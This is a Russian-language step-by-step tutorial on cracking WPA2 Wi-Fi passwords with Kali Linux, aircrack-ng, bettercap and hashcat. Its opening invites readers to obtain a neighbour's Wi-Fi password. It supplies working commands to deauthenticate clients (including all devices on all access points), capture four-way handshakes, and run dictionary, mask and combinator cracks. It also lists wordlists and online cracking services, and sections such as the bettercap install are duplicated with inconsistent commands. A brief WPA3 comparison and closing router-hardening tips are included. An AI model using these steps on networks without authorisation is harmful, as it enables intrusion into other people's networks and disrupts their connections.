- Как взламывать Wi-Fi сети с помощью Kali Linux
- Как взломать Wi-Fi с помощью Kali Linux или Ubuntu (пошаговая инструкция в картинках)
- 2. Установка aircrack-ng
- 3. Установка bettercap
- 4. Мониторинг сети
- 5. Получение рукопожатий
- Четырехстороннее рукопожатие
- 6. Выбор нужных рукопожатий
- 7. Получаем пароль
- 8. Подбор по словарю
- 9. Брутфорс и атака по маске
- 10. Комбинаторная атака
- 11. Куда сохраняется пароль
- 12. Онлайн-сервисы по расшифровке хеша
- 13. Разница между WPA2 и WPA3
- 14. Дополнительные материалы
- Файл .hccapx для практики
- Онлайн-конвертер .pcap в .hccapx
- Словари
- Онлайн-платформы для расшифровки хеша
- Бесплатные
- Платные
- Чем открыть большой текстовой файл
- Чтение
- Редактирование
- Полезные ссылки
- Заключение
Как взламывать Wi-Fi сети с помощью Kali Linux
Раз вы тут то вы серьёзно захотели узнать пароль от соседского Wi-Fi или пришли за знаниями, рассмотрим теорию взлома:
Большинство роутеров используют технологию «WPA 2» который пришел на замену устаревших «WPA» и «WEP» , устранив их проблемы с безопасностью
но по одной старой фразе: для каждой болезни (защиты) найдется лекарство (способ взлома)
и у «WPA 2» есть уязвимость в виде «Hanshake» ( хендшейк, на русском рукопожатие) — процесс знакомства клиента и модема, во время которого устройства идентифицируют друг друга и обмениваются секретными ключами. Handshake происходит каждый раз, когда мы подключаемся к модему, роутеру серверу и тд.
Суть взлома: Перехватить ‘Handshake’ , и расшифровать его секретные ключи
Четырехстороннее рукопожатие (англ. four-way handshake) – механизм создания парного переходного ключа PTK для защиты трафика.
самое важное в этом рукопожатии это 2 рукопожатие и в добавок к нему необходим первый или третий
минимальный вариант 2 и 3 рукопожатия
Надеюсь у вас уже есть компьютер с Kali Linux установить ее не сложнее чем Windows
попробуем взломать ТЕСТОВУЮ сеть
Для этого нам понадобится aircrack-ng (в Kali предустановлен) и BetterCap (Устанавливать придется самому)
sudo apt update sudo apt install golang git build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev sudo go install github.com/bettercap/bettercap
Bettercap – программа для мониторинга и спуфинга. Установим bettercap из исходников. Введем в терминале следующие команды:
Еще вам надо проверить вашу сетевую карту
если она не имеет функции мониторинга то она не подойдет
Как взломать Wi-Fi с помощью Kali Linux или Ubuntu (пошаговая инструкция в картинках)
Устанавливаем последнюю версию VirtualBox и скачиваем Kali Linux VirtualBox 64-Bit (OVA) или 32-Bit. Запускаем VirtualBox и нажимаем на кнопку Импортировать .
Выбираем образ Kali Linux, назначаем количество ядер и ОЗУ для виртуальной машины и нажимаем на кнопку Импорт .
Запускаем Kali Linux и вводим логин kali и пароль kali .
2. Установка aircrack-ng
Aircrack-ng – набор инструментов для мониторинга, пентестинга Wi-Fi сетей и взлома WEP, WPA 1 и 2. В Kali утилита aircrack-ng предустановлена. В Ubuntu выполним следующую команду:
sudo apt install aircrack-ng
3. Установка bettercap
Bettercap – программа для мониторинга и спуфинга. Установим bettercap из исходников. Введем в терминале следующие команды:
sudo apt update sudo apt install golang git build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev эта команда выполняется долго go get github.com/bettercap/bettercap
Перейдем в каталог с bettercap:
в Kali: cd /home/kali/go/src/github.com/bettercap/bettercap/ в Ubuntu: cd /home/USERNAME/go/src/github.com/bettercap/bettercap/ Затем введем: make build sudo make install
4. Мониторинг сети
Если к компьютеру подключен USB Wi-Fi адаптер, включим его следующим образом: Устройства → USB → MediaTek 802.11 n WLAN . Название Wi-Fi адаптера может отличаться.
Вот тут на алике у норм продавца (сам покупал у него) купить
Узнаем имя Wi-Fi адаптера с помощью команды ifconfig или ip a .
В нашем случае адаптер называется wlan0 .
Сначала отключим ненужные процессы:
Затем переключим адаптер в режим мониторинга:
sudo airmon-ng start wlan0
Запустим bettercap следующей командой:
sudo bettercap --iface wlan0
Начнем «слушать» Wi-Fi, введя в терминал wifi.recon on .
Для просмотра списка обнаруженных сетей введем wifi.show .
5. Получение рукопожатий
Выберем цель – точка доступа NX531J . Попробуем получить рукопожатия (англ. handshake) между точкой доступа NX531J и подключенным к ней устройством. Ждем, когда клиент отключится и подключится снова, либо принудительно отключим его командой деаутентификации: wifi.deauth MAC-адрес точки доступа
MAC-адрес – уникальный идентификатор сетевого устройства. Его значение берем из столбца BSSID. В нашем случае: wifi.deauth 90:c7:aa:bb:cc:dd .
Повторяем эту команду, пока не перехватим рукопожатия.
wifi.deauth * и wifi.deauth all отключают все устройства на всех точках доступа.
Четырехстороннее рукопожатие
Четырехстороннее рукопожатие (англ. four-way handshake) – механизм создания парного переходного ключа PTK для защиты трафика.
- временный ключ TK;
- ключ подтверждения ключа EAPOL;
- ключ шифрования EAPOL-key.
Самое важное рукопожатие – второе. В дополнение к нему необходимо первое и/или третье рукопожатие. Лучший минимальный вариант – второе и третье рукопожатия.
Файл с рукопожатиями сохраняется в /root/bettercap-wifi-handshakes.pcap . Скопируем его в домашнюю директорию:
в Kali: sudo cp /root/bettercap-wifi-handshakes.pcap /home/kali/ в Ubuntu: sudo cp /root/bettercap-wifi-handshakes.pcap /home/USERNAME/
6. Выбор нужных рукопожатий
Чтобы выбрать интересующие нас рукопожатия и экспортировать их в отдельный файл, нам понадобится программа для анализа сетевых протоколов WireShark.
В Ubuntu установим WireShark:
sudo apt install wireshark
Введем в терминале команду wireshark . Откроется программа с графическим интерфейсом. Нажмем Сtrl+O и откроем файл с рукопожатиями bettercap-wifi-handshakes.pcap
Отфильтруем данные по мак-адресу wlan.addr==90:c7:aa:bb:cc:dd и отсортируем по времени, кликнув по столбцу Time . Также можно отсортировать по номеру No. . Значения ANonce и SNonce меняются каждую сессию, поэтому выбираем рукопожатия, разделенные небольшим временным промежутком (десятки миллисекунд). Рукопожатия из разных сессий для взлома непригодны.
Как видно, мы получили первое, второе и третье рукопожатия. Выделим все рукопожатия EAPOL, файл с именем сети SSID (в нашем случае это Association Request) и нажмем File → Export Specified Packets .
Откроется диалоговое окно, в котором выберем Selected packets only и сохраним файл под названием hs.pcap .
7. Получаем пароль
Для начала, конвертируем файл hs.pcap в файл hs.hccapx (в команде новый файл пишется без расширения, только название):
в Kali: sudo aircrack-ng -j /home/kali/hs /home/kali/hs.pcap в Ubuntu: sudo aircrack-ng -j /home/USERNAME/hs /home/USERNAME/hs.pcap
Это нужно, чтобы программа по расшифровке хеша hashcat смогла прочесть файл. Она подбирает пароли с помощью ЦП и/или ГП.
8. Подбор по словарю
В Ubuntu установим hashcat командой:
Словарь – txt-файл с одним словом в каждой строке (рис. 16) Создадим или скачаем словарь (см. доп. материалы) и поместим его в /home/kali , либо /home/USERNAME для Ubuntu.
Пароль от моей точки доступа: qwerty12 . Он присутствует в словаре для подбора пароля.
Чтобы начать перебор по словарю введем команду:
в Kali: hashcat --force -m2500 -a0 /home/kali/hs.hccapx /home/kali/dic.txt в Ubuntu: hashcat --force -m2500 -a0 /home/USERNAME/hs.hccapx /home/USERNAME/dic.txt
Расшифруем значения опций:
-m2500 – тип взламываемого хеша WPA-EAPOL-PBKDF2.
-a0 – атака по словарю. Можно без этого флага, так как он работает по умолчанию.
/home/kali/hs.hccapx – файл хеша.
В случае успеха статус взлома примет значение Cracked и мы получим пароль (рис. 17).
9. Брутфорс и атака по маске
При брутфорсе (англ. brute force) перебираются все возможные символы. Используя маски, мы сужаем диапазон подбираемых символов, например, только числа или только числа и строчные символы. Таким образом на перебор требуется меньше времени. Этот подход удобен, если мы примерно знаем, как человек придумывает пароли. Из атаки по маске можно сделать брутфорс, включив в перебор все символы.
Для атаки по маске введем следующую команду:
в Kali: hashcat -m2500 -a3 -1?l -2?d /home/kali/hs.hccapx ?1werty?2?2 в Ubuntu: hashcat -m2500 -a3 -1?l -2?d /home/USERNAME/hs.hccapx ?1werty?2?2
-m2500 – тип взламываемого хеша, WPA-EAPOL-PBKDF2.
-1?l – маска по прописным латинскими буквам (прописная буква L).
?1werty?2?2 – предполагаемый пароль с неизвестными символами. В данном случае задача упрощена для экономии времени.
Команда для расчета через видеокарту:
hashcat -D2 -m2500 -a3 -1?l -2?d hs.hccapx ?1werty?2?2
10. Комбинаторная атака
В комбинаторной атаке используются два словаря. Слова из двух словарей конкатенируются. Если словари содержат следующие слова:
то после их соединения получим такой словарь:
HelloHello HelloWorld Hello5588 Hello! WorldHello WorldWorld World5588 World! 5588Hello 5588World 55885588 5588! !Hello !World !5588 !!
Запустим комбинаторную атаку:
в Kali: hashcat -m2500 -a1 /home/kali/hs.hccapx /home/kali/dic1.txt /home/kali/dic2.txt в Ubuntu: hashcat -m2500 -a1 /home/USERNAME/hs.hccapx /home/USERNAME/dic1.txt /home/USERNAME/dic2.txt
/home/kali/dic1.txt – первый словарь.
/home/kali/dic2.txt – второй словарь.
11. Куда сохраняется пароль
После удачной расшифровки пароль выводится на экран и записывается в файл ~/.hashcat/hashcat.potfile .
Откроем его в текстовом редакторе, чтобы посмотреть результат:
sudo nano ~/.hashcat/hashcat.potfile
12. Онлайн-сервисы по расшифровке хеша
Также хеш был отправлен в бесплатный онлайн-сервис по расшифровке хеша onlinehashcrack.com и через 12 часов 6 минут пришло письмо, что пароль получен (рис. 20).
Платформа passcrack.online получила пароль за 5 минут (рис. 21). С отправки в онлайн-сервисы лучше начинать расшифровку, так как вычислительных ресурсов у них больше, чем у домашнего компьютера.
13. Разница между WPA2 и WPA3
В июле 2018 года Wi-Fi Alliance выпустил протокол беспроводной безопасности WPA3. Посмотрим, чем он отличается от своего предшественника.
- уязвим к взлому через WPS;
- возможен перехват рукопожатий и получение пароля с помощью брутфорса;
Преимущества WPA3 в сравнении с WPA2:
- устранена уязвимость четырехстороннего рукопожатия за счет применения технологии SAE (Simultaneous Authentication of Equals), которая защищает от офлайн атак по словарю.
- поддержка PMF (Protected Management Frames) для контроля целостности трафика;
- шифрование 192 бит в режиме WPA3-Enterprise и 128 бит в WPA3-Personal;
- упрощенная настройка IoT-устройств.
Общее уязвимое место у WPA 2 и 3 – WPS (Wi-Fi Protected Setup).
14. Дополнительные материалы
Файл .hccapx для практики
На сайте hashecat доступен для скачивания файл .hccapx, на котором можно попрактиковаться в расшифровке. Зашифрованный пароль: hashcat! .
Онлайн-конвертер .pcap в .hccapx
Словари
- wpa2-wordlists – GitHub;
- SecLists – GitHub;
- Probable-Wordlists – GitHub;
- naive-hashcat – GitHub, файл rockyou.txt, 14 300 000 слов
- wordlists – GitHub, 460 000 слов;
- english-words – GitHub;
- md5this.com – пароль к архивам md5this.com;
- Rocktastic12a – 1.37 ГБ;
- crackstation.net;
- wirelesshack.org;
- wpa-sec.stanev.org.
Онлайн-платформы для расшифровки хеша
Бесплатные
- crypt-fud.ru – принимает файлы .cap и .hccapx;
- passcrack.online – принимает только файлы .hccapx размером не более 5Кб. Ссылка на страницу загрузки файла для расшифровки придет в письме после регистрации;
- onlinehashcrack.com – бесплатно, если пароль простой «12345678» или он есть в словаре из 20 млн слов. В ином случае используется брутфорс на ГП 9$/час.
- wpa-sec.stanev.org – распределенная система;
- kraken-client – распределенная система;
Платные
Чем открыть большой текстовой файл
Бесплатные программы для чтения и редактирования больших txt-файлов.
Чтение
Редактирование
- Vim (Windows, macOS, Linux);
- Emacs (Windows, macOS, Linux);
- Notepad++ (Windows);
- Large File Editor (Windows);
- GigaEdit (Windows);
Полезные ссылки
Заключение
Мы научились мониторить Wi-Fi сети, проводить деаутентификацию подключенных к точке доступа устройств, перехватывать рукопожатия, получать пароли методом подбора по словарю и брутфорсом. Также узнали разницу между WPA2 и WPA3, и определили их общее уязвимое место.
Несколько рекомендаций, повышающих информационную безопасность:
- использовать сложный пароль и периодически менять его;
- отключить функцию WPS в роутере;
- регулярно обновлять прошивку роутера;
- использовать VPN (виртуальная частная сеть): OpenVPN, WireGuard и прочие.